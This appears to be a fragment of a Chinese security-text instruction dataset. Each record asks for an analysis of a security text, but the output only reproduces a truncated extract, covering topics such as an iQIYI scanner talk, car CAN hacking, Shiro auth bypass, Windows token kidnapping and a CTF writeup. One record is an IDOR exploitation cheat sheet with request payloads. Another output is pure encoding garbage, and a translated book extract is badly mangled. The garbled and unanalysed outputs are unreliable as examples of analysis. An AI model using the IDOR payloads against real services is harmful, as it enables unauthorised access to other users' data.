law) made trust implicit: Physical connections between parties, plus an (mostly) separate control plane meant calls generally went where intended, unmolested. Generally, confidence was high that the called party was the party intended. Until the rise of the telephreaks! Jon Draper, AKA Capn Crunch found a 2600Hz whistle in a box ofCapn Crunch, and changed the world. An array of colorful boxes were soon developed by enterprising telephreaks around the world. Despite this, the public generally retained high confidence in the integrity and confidentiality of their phone calls. 5 When Dial Service began, each police, fire, and ambulance service had its own 7-digit local number. Many local governments distributed stickers that listed the numbers for their local services. Consumers could place these on the backs of their telephone receivers, so that the numbers would be near-to-hand, if an emergency arose. Dialing these digits took time, however, and the numbers varied from place to place, and even within different police precincts or fire service zones within a single city or county. 6 In the mid-60s, the National Association of Fire Engineers (now the International Association of Fire Chiefs) advocated ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n爱奇艺安全攻防实践 李劼杰 About Me  爱奇艺 安全云 SRC 负责人  WooYun 白帽子 Rank TOP 10  腾讯 TSRC 2016 年度漏洞之王 李劼杰 http://www.lijiejie.com subDomainsBrute / BBScan / githack / htpwdScan Agenda  漏洞扫描  威胁感知  入侵检测  堡垒机  渗透测试 扫描器 现状  小机房端口策略过于宽松  资产变更频繁  服务间依赖复杂 20万+ 开放端口 300万+ 设计目标 稳定 高效 误报率低 高危漏洞覆盖全 任务管理合理 30 个扫描节点 每月完成约1亿次插件扫描 扫描组件 Web插件 弱口令插件 通用漏洞插件 信息泄露插件 集成AWVS 依赖Medusa 一些Python脚本 实现类似 BugScan 的扫描框架 集成BBScan 扫描策略  外网优先原则  插件分组  每6小时  严重漏洞  每天  高中危漏洞  每周  低危漏洞  首次发现的外网端口最高优先级进入扫描队列 信息泄露插件  https://github.com/lijiejie/BBScan  压缩包  git svn  配置文件  文件遍历  URL + 简单规则 /composer/send_email?to=test@xxx&url=http://not.existed.domain {status=200} {tag=\"gaierror: [Errno -2]\"} {root_only} 弱口令插件  常见弱口令  远控卡弱口令  IPMI Cipher 0  IPMI hash泄露 SSHRDPsambaTelnet FTPVNC IPMI Rsync MySQLMS SQL ServerPostgres RedisMongoDB TomcatActiveMQRabbitMQ 通用漏洞插件 from port_cracker.plugin_scan.dummy import * def do_scan(ip, port, service, task_msg): if service.lower().find('http') < 0: return try: url ='http://%s:%s' % (ip, port) + '/security-scan.txt' curl_cmd = '-X \"PUT\" -d \"202cb962ac59075b964b07152d234b70\" %s' % url code, head, res, errcode, _ = curl.curl(curl_cmd) if code == 200: code, head, res, errcode, _ = curl.curl(url) if code == 200 and res.startswith('202cb962ac59075b964b07152d234b70'): ret = { 'algroup': 'PUT File', 'affects': 'http://%s:%s' % (ip, port), 'details': 'PUT File Vulnerability\\n\\n' + url } return ret except Exception as e: pass  只需要实现 do_scan 函数  插件远程部署可自动重载无需重启扫描进程 资产发现 内部接口监控 全网PING HIDS端口清点 新增 外网端口 等待任务调度 N 最高优先级扫描 海外虚机端口检查 Y [mask] 分钟 内发现新设备 [mask] 分钟 内完成端口扫描 任务队列 资产发现  超过 40万个 HTTP服务支持全文搜索  Chrome Headless 动态爬虫进行全网URL收集 支持全文索引 信息泄露 < 15MIN 内网巡检 < 2H SSL证书扫描  证书过期  证书不匹配  弱加密算法  心脏滴血漏洞  ATS合规 代理配置不当 正向 HTTP代理 Socks代理 未授权访问 ACL配置不当 黑客直接穿内网 DNS域传送  DNS域传送配置不当  泄露网络拓扑  暴露攻击面  泄露敏感服务如DB后台 Header命令注入  在Request Header注入shell命令被应用执行如 日志分析程序执行 def do_scan(ip, port, service, task_msg): if service.lower().find('http') < 0: return host = '%s:%s' % (ip, port) conn = httplib.HTTPConnection(host, timeout=20) he", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nComputer Science / www.isec.utulsa.edu How to Hack Your Mini Cooper: Reverse Engineering CAN Messages on Passenger Automobiles Jason Staggs Computer Science / www.isec.utulsa.edu Who is this guy?  Jason Staggs  Graduate Research Assistant  Institute for Information Security (iSec)  Crash Reconstruction Research Consortium (TU-CRRC)  TRUE Digital Security  Cyber Security Analyst Computer Science / www.isec.utulsa.edu Why do we hack cars?  Related work  Experimental Security Analysis of a Modern Automobile  Comprehensive Experimental Analyses of Automotive Attack Surfaces  Understanding computer and network systems on cars  Underlying CAN protocol and components lack of authentication and verification of messages  Understanding potential points of vulnerability  Vehicle network security is in its infancy  But most importantly Computer Science / www.isec.utulsa.edu To prevent this Computer Science / www.isec.utulsa.edu From turning into this Computer Science / www.isec.utulsa.edu Because of this... Computer Science / www.isec.utulsa.edu CAN Clock Project  Research project developed as a proof of concept  Manipulating CAN nodes via CAN network  Reverse engineering CAN messages  2003 Mini Cooper Computer Science / www.isec.utulsa.edu Vehicle communication networks  Common vehicle protocols  CAN (Most widely used among manufactures)  FlexRay  LIN  MOST  J1850 (GM/Chrysler)  J1939 (Heavy Trucks)  J1708/J1587 (Being phased out due to J1939)  2008: All US cars use CAN for mandated EPA diag. Computer Science / www.isec.utulsa.edu Interconnected vehicle networks Computer Science / www.isec.utulsa.edu Controller Area Networks  Bosch CAN standard  Developed in the 80s  European automotive manufactures were early adopters  Multi-master broadcast message system  Standard Format  11-bit message ID  211 or 2048 possible message IDs  MFG. use of proprietary IDs for their ECUs  Extended Format  29-bit message ID  229 or 537 million message IDs  Used extensively by J1939 Computer Scien", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n03 2020 DevSecOps 行业洞察报告 法律声明 此报告为悬镜安全与 Freebuf 咨询联合制作报告中的文字图片表格等版权均为悬镜安全与 Freebuf 咨询 共同所有任何组织个人未经悬镜安全及 Freebuf 咨询授权不得转载更改或者以任何方式传送复印 派发该报告内容违者将依法追究法律责任转载或引用本报告内容不得进行如下活动 不得擅自同意他人转载引用本报告内容 不得引用本报告进行商业活动或商业炒作 本报告中的信息及观点仅供参考悬镜安全及 Freebuf 咨询对本报告拥有最终解释权 悬镜安全DevSecOps敏捷安全领导者由北京大学网络安全技术研究团队 XMIRROR主导创立专注于以AI人工智能技术为核心的DevSecOps软件供 应链持续威胁一体化检测防御 悬镜首创基于AI情景感知的DevSecOps持续威胁管理技术从源头追踪软件 供应链在开发测试部署运营等关键环节面临的应用安全风险与未知外部 威胁帮助政企组织逐步构筑一套适应自身业务弹性发展面向敏捷业务交付 并引领未来架构演进的内生安全开发运营体系 关于悬镜 FreeBuf.COM网络安全行业门户每日发布专业的安全资讯技术剖析分享 国内外安全资源与行业洞见是网络安全从业者与爱好者广泛关注的行业社 区平台 FreeBuf咨询集结安全行业经验丰富的安全专家和分析师常年对信息安全技 术行业动态保持追踪洞悉安全行业现状和趋势呈现最专业的研究与咨询 服务 关于FreeBuf咨询 出品人子芽尤文董毅 编辑李雅刘一赫栗子武文婧 设计王金花赵青青王璐 参编人员 导语 INTRODUCTION 今年的 RSA Conference 于 2 月 24-28 日在美国旧金山如期召开会议主题为Human Element人为因素被认为是影响未来网络安全发展最深远的主题会议期间官方还基于参 会人员的关注热度发布了 2020 年网络安全行业十大趋势DevSecOps 再次成为大家关注的焦 点之一其中有着全球网络安全风向标之称的 RSA 创新沙盒进入十强的安全厂商中近半 数聚焦在应用安全领域BluBracket 和 ForAllSecure 等就是今年 DevSecOps 领域的创新厂商代表 ComcastUS DoD 及 NIWC 等机构的 DevSecOps 落地应用也逐渐成为行业实践典范 虽然国内的金融能源互联网等产业用户没有像美国一些头部机构那样做 DevSecOps 的深 度转型大部分还是现有的 SDL 体系但这并不妨碍我们开始积极拥抱 DevSecOps 框架及 CI/CD 黄金管道涉及的敏捷安全活动正是这些关键活动涉及的新兴技术的逐渐成熟和敏捷安全新理念 的普及推动了国内 DevSecOps 体系的逐渐落地关键标志之一就是持续专注 DevSecOps 的创 新安全厂商开始涌现我们的通用技术方案开始被越来越多的行业头部用户采纳并分阶段持续 为行业用户建立起逐渐完善的安全开发运营体系 本报告是悬镜安全联合 Freebuf 咨询在国内发布的首个 DevSecOps 行业调查报告希望从行 业用户厂商力量及安全媒体等综合视角观察并分析 DevSecOps 在国内的发展现状报告上篇对 DevSecOps 实践情况进行了一定调查通过问卷调查资料收集交流访谈及技术沙龙等形式开 展相关调查工作对千余名不同 IT 背景的专业人员进行了调研通过他们的声音和真实反馈表 明了 DevSecOps 正逐渐被应用开发团队认可并加速实践部分领先机构的应用安全工作在软件开 发生命周期的早期就已经实现高度自动化报告下篇描绘了不同行业的 DevSecOps 实践现状梳 理了当前发展热点技术并对未来发展趋势做了展望这部分内容主要依赖于同行业专家的沟通 与座谈并融合了我们在行业中观察到的具体现象发展趋势和应用案例 拥抱变化是敏捷安全建设的基石我们希望通过本报告的调查及分析能够推动更多行业用 户结合自身业务特点尝试了解对比学习甚至着手采纳业内领先的 DevSecOps 敏捷安全体系及 落地实践经验从源头追踪软件供应链在开发测试部署运营等关键环节面临的应用安全风 险与未知外部威胁帮助政企组织逐步构筑一套适应自身业务弹性发展面向敏捷业务交付并引 领未来架构演进的内生安全开发运营体系同时也希望本报告能够鼓励更多不同类型的技术力 量与 DevSecOps 行业展开新的对话并成为建立新的安全基准的参考依据 出品人 子芽 2020 年 12 月 目录 1. DevSecOps发展现状 34 1. DevSecOps行业调查 02 2. DevSecOps调查后记 31 1.1 DevSecOps现有体系 36 1.2 DevSecOps安全工具金字塔 40 1.3 不同行业的DevSecOps现状 48 1.4 非安全工具的DevSe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n!  \" # $ % & ' ( % ) * + , - * - . / 0 / 1 2 . . 2 / - 3 4 2 5 / 6 - 7 / / 2 3 8 1 / - 2 4 3 2 4 / 9 0 5 - : ; < = > ? @ A B C D E F G H I J K L MN O P Q Q Q R S T T U V W H I X Y Z W [ \\ K I Y ]  _ I Y F W H L E ` L K _ a F _ b a L L E F H E c _ N L d a F _ b a L L E I Y ` H _ _ Y E ` L e W H _ f G E X N W b H _ [ I Y L H I g X L _ I L W b [ h E H i E [ I ` G I L X b [ _ H L K _ L _ H i Y E ` L K _ j k l j _ b _ H W  m X g  I N n I N _ b Y _ W Y F X g  I Y K _ [ g G L K _ o H _ _ p E ` L e W H _ o E X b [ W L I E b f _ I L K _ H q _ H Y I E b S E ` L K _ n I N _ b Y _ r E H MW L G E X H E F L I E b O W b G  W L _ H q _ H Y I E b d s t u v w x y z { x { | } ~ } w  |  z                   v   v  ~ z y  ~   y s   < ?    ?  i W L N K Y _ N L I E b Y e I L K W H N K Y F _ N ] b I Y K  m  [ _ ] b I L I E b Y r [ W L W L G F _ Y r i I  _ Y L E b _ Y    ?    ?                        ª           ² ³  L E [ E µ I b L _ H ` W N _ N I H N X I L E b _ F _ H I b L _ H ` W N _ r  m  r m   r  p a M¹ º n O r D  k  I b L _ H ` W N _ Y I i I  W H I L I _ Y   m  K W  ` [ X F  _ ¼ ½   R S ¾ S  m   K W  ` [ X F  _ ¼ Z p R U  À   p a K W  ` [ X F  _ ¼ ½   R S ¾ S r S  I b _ Y M   Á ¾ ¾ S ¾ ½ O P  D  k M   Á ¾ T À T Â O  N I H N X I L Y  Y _ H I W  L E  E J I N R   Á ¾ S ¾ À ½ S T h m V  m d ¾ T T  Y I J b W  F H E L _ N L I E b R   Á ¾ Ã Ä P  h m V  m d¾ T T   E J I N L E  m  h  p a M K W  ` [ X F  _ ¼ Z p R S ¾ S O R   Á ¾ ¾ S ¾ ½ P Ã h m V  m d ¾ T T   E J I N L E m   MK W  ` [ X F  _ ¼ Z p R U  À O R   Á ¾ U U P ½  h m V  m d ¾ T T   E J I N L E D  k R   Á ¾ T À T  h p a d P À T  H _ J X  W L E H Y  À  R   Á   ¾  h m V  m d¾ T T  ¾ d¾  R   Á   S  h m V  m d¾ T T      Å ³  ³     L E [ E µ I b L _ H ` W N _ N I H N X I L    Æ   Ç                ª        È ² É  Ê É Ê Ë Ì  Ê          Å  Ê Í  ³ Î Î ³ Ï   Ð ³  Ñ Ò ³       Ó Ô  Õ   Ê Ö Î  Ë Ì  Ê ³  Ñ L E [ E µ [ E Y g W Y _ [ ] H i e W H _ Ø Ù < Ú C   ?  Û          L E [ E µ J _ b _ H I N I b L _ H ` W N _ ` E H Y e [ W L W  I b Ü r N E i i E", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Insecure Direct Object Reference (IDOR) ## Introduction IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system. ## Where to find - Usually it can be found in APIs. - Check the HTTP request that contain unique ID, for example `user_id` or `id` ## How to exploit 1. Add parameters onto the endpoints for example, if there was ``` GET /api/v1/getuser HTTP/1.1 Host: example.com ... ``` Try this to bypass ``` GET /api/v1/getuser?id=1234 HTTP/1.1 Host: example.com ... ``` 2. HTTP Parameter pollution ``` POST /api/get_profile HTTP/1.1 Host: example.com ... user_id=hacker_id&user_id=victim_id ``` 3. Add .json to the endpoint ``` GET /v2/GetData/1234 HTTP/1.1 Host: example.com ... ``` Try this to bypass ``` GET /v2/GetData/1234.json HTTP/1.1 Host: example.com ... ``` 4. Test on outdated API Versions ``` POST /v2/GetData HTTP/1.1 Host: example.com ... id=123 ``` Try this to bypass ``` POST /v1/GetData HTTP/1.1 Host: example.com ... id=123 ``` 5. Wrap the ID with an array. ``` POST /api/get_profile HTTP/1.1 Host: example.com ... {\"user_id\":111} ``` Try this to bypass ``` POST /api/get_profile HTTP/1.1 Host: example.com ... {\"id\":[111]} ``` 6. Wrap the ID with a JSON object ``` POST /api/get_profile HTTP/1.1 Host: example.com ... {\"user_id\":111} ``` Try this to bypass ``` POST /api/get_profile HTTP/1.1 Host: example.com ... {\"user_id\":{\"user_id\":111}} ``` 7. JSON Parameter Pollution ``` POST /api/get_profile HTTP/1.1 Host: example.com ... {\"user_id\":\"hacker_id\",\"user_id\":\"victim_id\"} ``` 8. Try decode the ID, if the ID encoded using md5,base64,etc ``` GET /GetUser/dmljdGltQG1haWwuY29t HTTP/1.1 Host: example.com ... ``` dmljdGltQG1haWwuY29t => victim@mail.com 9. If the website using GraphQL, try to find IDOR using GraphQL ``` GET /graphql HTTP/1.1 Host: example.com ... ``` ``` GET /graphql.php?query= HTTP/1.1 Host: example.com ... ``` 10. MFLAC (Missing Functi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"SET SESSION AUTHORIZATION\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME SET SESSION AUTHORIZATION \\- 为当前会话设置会话用户标识符和当前用户标识符 .SH SYNOPSIS .sp .nf SET [ SESSION | LOCAL ] SESSION AUTHORIZATION \\fIusername\\fR SET [ SESSION | LOCAL ] SESSION AUTHORIZATION DEFAULT RESET SESSION AUTHORIZATION .sp .fi .SH \"DESCRIPTION 描述\" .PP 这条命令把当前 SQL 会话环境里的会话用户标识和当前用户标识设置为 username 这个用户名可以写成一个标识符或者一个字串文本 使用这个命令我们可以临时变成一个非特权用户稍后再切换回超级用户 .PP 会话用户标识符一开始设置为可能经过认证的客户端提供的用户名 当前用户标识符通常等于会话用户标识符 但是可能在 \"setuid\" 的环境里或者类似的机制里临时改变 当前用户标识符和权限检查相关 .PP 只有在初始会话用户\\fI认证了的用户\\fR有超级用户权限的时候会话用户标识符才能改变 否则只有在指定了被认证的用户名的情况下系统才接受该命令 .PP SESSION 和 LOCAL 修饰词和普通 SET [\\fBset\\fR(7)] 命令里的作用相同 .PP DEFAULT 和 RESET 形式重置会话和当前用户标识符为初始认证的用户名这些形式可以为任何用户执行 .SH \"EXAMPLES 例子\" .sp .nf SELECT SESSION_USER, CURRENT_USER; session_user | current_user --------------+-------------- peter | peter SET SESSION AUTHORIZATION 'paul'; SELECT SESSION_USER, CURRENT_USER; session_user | current_user --------------+-------------- paul | paul .sp .fi .SH \"COMPATIBILITY 兼容性\" .PP SQL 标准允许一些其它的表达式出现在文本 username 的位置上不过这个东西实际上并不重要 PostgreSQL 允许标识符语法 \"username\"而 SQL 不允许 SQL 不允许在一个事务的过程中用这条命令 PostgreSQL 没有这个限制因为没有什么理由不允许这样用 标准中表示执行这条命令的权限要求是具体实现定义的 .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-shiro权限绕过 环境搭建 源码地址 使用github下载器即可下载 CVE-2020-1957 代码配置 认证设置 package org.javaboy.shirobasic; import org.apache.shiro.mgt.SecurityManager; import org.apache.shiro.spring.web.ShiroFilterFactoryBean; import org.apache.shiro.web.mgt.DefaultWebSecurityManager; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import java.util.LinkedHashMap; import java.util.Map; /** * @Author 江南一点雨 * @Site www.javaboy.org 2019-06-05 11:16 * * 在这里进行 Shiro 的配置 * Shiro 的配置主要配置 3 个 Bean  * * 1. 首先需要提供一个 Realm 的实例 * 2. 需要配置一个 SecurityManager在 SecurityManager 中配置 Realm * 3. 配置一个 ShiroFilterFactoryBean 在 ShiroFilterFactoryBean 中指定路径拦截规则 等 */ @Configuration public class ShiroConfig { @Bean MyRealm myRealm() { return new MyRealm(); } @Bean SecurityManager securityManager() { DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); manager.setRealm(myRealm()); return manager; } @Bean ShiroFilterFactoryBean shiroFilterFactoryBean() { ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); //指定 SecurityManager controller代码 bean.setSecurityManager(securityManager()); //登录页面 bean.setLoginUrl(\"/login\"); //登录成功页面 bean.setSuccessUrl(\"/index\"); //访问未获授权路径时跳转的页面 bean.setUnauthorizedUrl(\"/unauthorizedurl\"); //配置路径拦截规则注意要有序 Map<String, String> map = new LinkedHashMap<>(); map.put(\"/doLogin\", \"anon\"); map.put(\"/hello/*\",\"authc\"); //map.put(\"/**\", \"authc\"); bean.setFilterChainDefinitionMap(map); return bean; } } package org.javaboy.shirobasic; import org.apache.shiro.SecurityUtils; import org.apache.shiro.authc.AuthenticationException; import org.apache.shiro.authc.UsernamePasswordToken; import org.apache.shiro.subject.Subject; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PathVariable; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RestController; /** * @Author 江南一点雨 * @Site www.javaboy.org 2019-06-05 11:24 */ @R", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nToken Kidnapping's Revenge Cesar Cerrudo Argeniss Who am I?  Argeniss Founder and CEO  I have been working on security for +8 years  I have found and helped to fix hundreds of vulnerabilities in software such as MS Windows, MS SQL Server, Oracle Database Server, IBM DB2, and many more...  +50 vulnerabilities found on MS products (+20 on Windows operating systems)  I have researched and created novel attacks and exploitation techniques Agenda  Introduction  What is impersonation and what are tokens?  Windows XP and 2003 services security  Windows 7, Vista and 2008 services security  Token Kidnapping's revenge time  Conclusions Introduction  In the past all Windows services ran as Local SYSTEM account  Compromise of a service==full system compromise  Then MS introduced NETWORK SERVICE and LOCAL SERVICE accounts  Compromise of a service!=full system compromise  Windows Vista, Windows 2008 and Windows 7 introduced new protections  First Token Kidnapping issues were fixed, but as we are going to see Windows is still not perfect... What is impersonation and what are tokens?  Impersonation is the ability of a thread to execute using different security information than the process that owns the thread  ACL checks are done against the impersonated users  Impersonation APIs: ImpersonateNamedPipeClient(), ImpersonateLoggedOnUser(), RpcImpersonateClient()  Impersonation can only be done by processes with Impersonate a client after authentication (SeImpersonatePrivilege)  When a thread impersonates it has an associated impersonation token What is impersonation and what are tokens?  Access token is a Windows object that describes the security context of a process or thread  It includes the identity and privileges of the user account associated with the process or thread  They can be Primary or Impersonation tokens  Primary are those that are assigned to processes  Impersonation are those that can be get when impersonation occurs  Four impersonation levels: SecurityAnonymous, Secu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n谨将我们的工作献给 即将毕业离校的兄弟们  林晓鑫刘德超黄巍周蓝 珺胡禹轩王新喜何春晓崔剑李浩 以及 潘海东即将出世的小 Baby!  II  0 译者序 Linux System Prorgramming ( LSP) 的文工作实 工业 IBM 理 的工作的同的 同们林晓鑫王崔春何春晓李 的 SMS@lilacbbs.com 文献 的王刘文王刘德超王新喜同 校工作的校工业文 TeX 作的工作李 的工作 LSP 文进 内布原 IBM ( 工程) 晓 ( SUN ) 的们 的业时间对进的校提出的 们的的同们示 程 Harbin Linux User Group 的 , 们示 程方的工作以 的的存何方式 我们: Website : http://www.footoo.org Twitter : http://twitter.com/cliffwoo Email :cliffwoo@gmail.com 或 cliffwoo@footoo.org Google Groups :http://groups.google.com/group/lspcn/ 工业 2009 4 30  III  0 版权声明 Linux System Programming文的工作工业 IBM 的文程的, 业 Linux System Prorgramming的作及原出文 程的原作及出的出作 的  IV  目 录 译者序. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . III 版权声明 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . IV 第 1 章 简介和主要概念. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.1 程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.1.1 调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.1.2 调调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 1.1.3 C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 1.1.4 C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.2 API ABI. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.2.1 API. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.2.2 ABI . . . . . . . . . . .", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# MySQL大小写问题 **MySQL 查询是不区分大小写的** Mysql 默认的字符检索策略 - utf8_general_ci表示不区分大小写 - utf8_general_cs表示区分大小写 - utf8_bin 表示二进制比较同样也区分大小写 注意在 Mysql5.6.10 版本中不支持 utf8_genral_cs 创建表时直接设置表的 collate 属性为 utf8_general_cs 或者 utf8_bin如果已经创建表则直接修改字段的Collation 属性为 utf8_general_cs 或者 utf8_bin --- **测试** 新建一个表 test1 ,字段 text,大 A 小 a 2个数据,默认字符集 测试查询语句 可以看到大 A 小 a 都被查询出来了 --- 再新建一个表 test2 ,字段 text,大 A 小 a 2个数据,字符集 utf8_bin 测试查询语句 可见,区分了大小写 --- **修改语句** ``` ALTER TABLE xxxxxxxxx DEFAULT CHARACTER SET utf8 COLLATE utf8_bin; ``` --- ## Source & Reference - [Mysql查询英文如何严格区分大小写](http://www.imooc.com/article/14190)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Secu Prim (PPC, 65p) ###ENG [PL](#pl-version) After connecting to the server we get a PoW to solve, and then the task is to provide number of primes and perfect powers in given range. The ranges are rather small (less than 2000 numbers in between) so we simply iterate over the given range and use `gmpy` to tell us if the number if a probable prime or a perfect power: ```python def solve_task(start, end): print(\"Range size = \" + str(end - start)) counter = 0 for i in range(start, end + 1): if gmpy2.is_prime(i): counter += 1 elif gmpy2.is_power(i): counter += 1 print(\"Counted \" + str(counter)) return counter ``` And the whole script with PoW: ```python import hashlib import re import socket import itertools import string import gmpy2 def recvuntil(s, tails): data = \"\" while True: for tail in tails: if tail in data: return data data += s.recv(1) def proof_of_work(s): data = recvuntil(s, [\"Enter X:\"]) x_suffix, hash_prefix = re.findall(\"X \\+ \\\"(.*)\\\"\\)\\.hexdigest\\(\\) = \\\"(.*)\\.\\.\\.\\\"\", data)[0] len = int(re.findall(\"\\|X\\| = (.*)\", data)[0]) print(data) print(x_suffix, hash_prefix, len) for x in itertools.product(string.ascii_letters + string.digits, repeat=len): c = \"\".join(list(x)) h = hashlib.sha256(c + x_suffix).hexdigest() if h.startswith(hash_prefix): return c def get_task(s): sentence = recvuntil(s, [\"that: \"]) sentence += recvuntil(s, [\"\\n\"]) return sentence def solve_task(start, end): print(\"Range size = \" + str(end - start)) counter = 0 for i in range(start, end + 1): if gmpy2.is_prime(i): counter += 1 elif gmpy2.is_power(i): counter += 1 print(\"Counted \" + str(counter)) return counter def main(): url = \"secuprim.asis-ctf.ir\" port = 42738 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((url, port)) x = proof_of_work(s) print(x) s.sendall(x + \"\\n\") data = recvuntil(s, \"---\\n\") print(data) while True: data = recvuntil(s, [\"like n such\", \"corret!\", \"}\"]) print(data) if \"ASIS\" in data: print(data) if \"corret\" in data: print(\"failed\") break else: ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n大海捞针使用沙箱捕获多个零日漏洞 李琦 安全开发工程师 金权 漏洞挖掘和利用工程师 2019-5-30 关于我们 李琦 (@leeqwind) 360 核心安全高级威胁自动化团队 安全开发工程师 金权 (@jq0904) 360 核心安全高级威胁自动化团队 漏洞挖掘和利用工程师  高级威胁自动化和沙箱  使用沙箱发现在野 0day 漏洞 大纲 无处不在的网络攻击 我们至今捕获的五次在野利用 0day 漏洞的攻击事件 CVE-2018-15982 捕获到一次使用新的 Flash 0day (CVE-2018-15982) 针对政府机 构的国际网络攻击 2018-11 CVE-2018-8174 首家捕获新的使用浏览器 0day 漏洞 (CVE-2018-8174) 的 APT MS Office 攻击该漏洞影响当时最新版的 Internet Explorer 浏览 器和所有使用 IE 内核的应用程序 2018-04 2018-06 CVE-2018-5002 全球首家捕获在野利用的 Flash 0day 漏洞 (CVE-2018-5002) 该漏洞影响 Adobe Flash Player 29.0.0.171 和更早的所有版 本 2017-12 CVE-2018-0802 全球首家捕获 噩梦公式二代 (CVE-2018-0802) 0day 漏洞 2018年微软修复的首个在野 0day 漏洞 CVE-2017-11826 全球独家捕获在野利用的 0day 漏洞 (CVE-2017-11826) 这是中 国安全厂商捕获的第一个 Office 在野 0day 攻击 2017-09 无处不在的网络攻击 1 10 100 1000 10000 100000 1000000 doc docm docx eml html hwp msi nsis pdf ppt pptm pptx rtf swf vbs xls xlsm xlsx exe dll others Flash HWP IE Kernel Office PDF CVE-2012-0158 CVE-2015-1641 CVE-2015-1726 CVE-2015-2545 CVE-2016-7255 CVE-2017-11882 CVE-2017-8570 CVE-2018-0798 CVE-2018-0802 CVE-2018-4878 从 2018-03 至 2019-03 期间我们监测到的部分 N-day 漏洞攻击文件统计 部分文件类型分类 漏洞模块分类 部分漏洞计数 高级威胁自动化  大规模的样本云  静态反病毒引擎  AVE QEX QVM  样本预筛选策略  沙箱服务器集群  虚拟机隔离环境  沙箱自动化检测引擎  规则评分系统  检测结果告警和响应 样本云 分布式调度 扫描和筛选 搜索 告警 订阅 数据汇集 中心 工作服务器 工作服务器 工作服务器 数据源和预先筛选 沙箱服务器集群 面向使用者 高级威胁自动化  大规模的样本云  静态反病毒引擎  AVE QEX QVM  样本预筛选策略  沙箱服务器集群  虚拟机隔离环境  沙箱自动化检测引擎  规则评分系统  检测结果告警和响应 虚拟机镜像中心 沙箱环境 规则评分 日志 报告 日志处理 虚拟机 操作 VM 该怎么做 沙箱检测引擎  最初的方案动态库  注入目标进程执行检测功能  挂钩各系统动态库导出函数 沙箱检测引擎 运行 + 注入 检测模块 辅助进程 目标进程 子进程 Hook Exploit VEH Logging 检测模块 Hook Exploit VEH Logging 检测模块 运行 进程 注入检测模块 消息  最初的方案动态库  注入目标进程执行检测功能  挂钩各系统动态库导出函数  轻量级  沙箱检测引擎 运行 + 注入 检测模块 辅助进程 目标进程 子进程 Hook Exploit VEH Logging 检测模块 Hook Exploit VEH Logging 检测模块 运行 进程 注入检测模块 消息  最初的方案动态库  注入目标进程执行检测功能  挂钩各系统动态库导出函数  轻量级   这样就可以了吗 沙箱检测引擎 运行 + 注入 检测模块 辅助进程 目标进程 子进程 Hook Exploit VEH Logging 检测模块 Hook Exploit VEH Logging 检测模块 运行 进程 注入检测模块 消息 运行 + 注入 检测模块 辅助进程 目标进程 子进程 Hook Exploit VEH Logging 检测模块 Hook Exploit VEH Logging 检测模块 运行 进程 注入检测模块 消息  最初的方案动态库  注入目标进程执行检测功能  挂钩各系统动态库导", "category": "text_analysis", "source": "security_papers"}
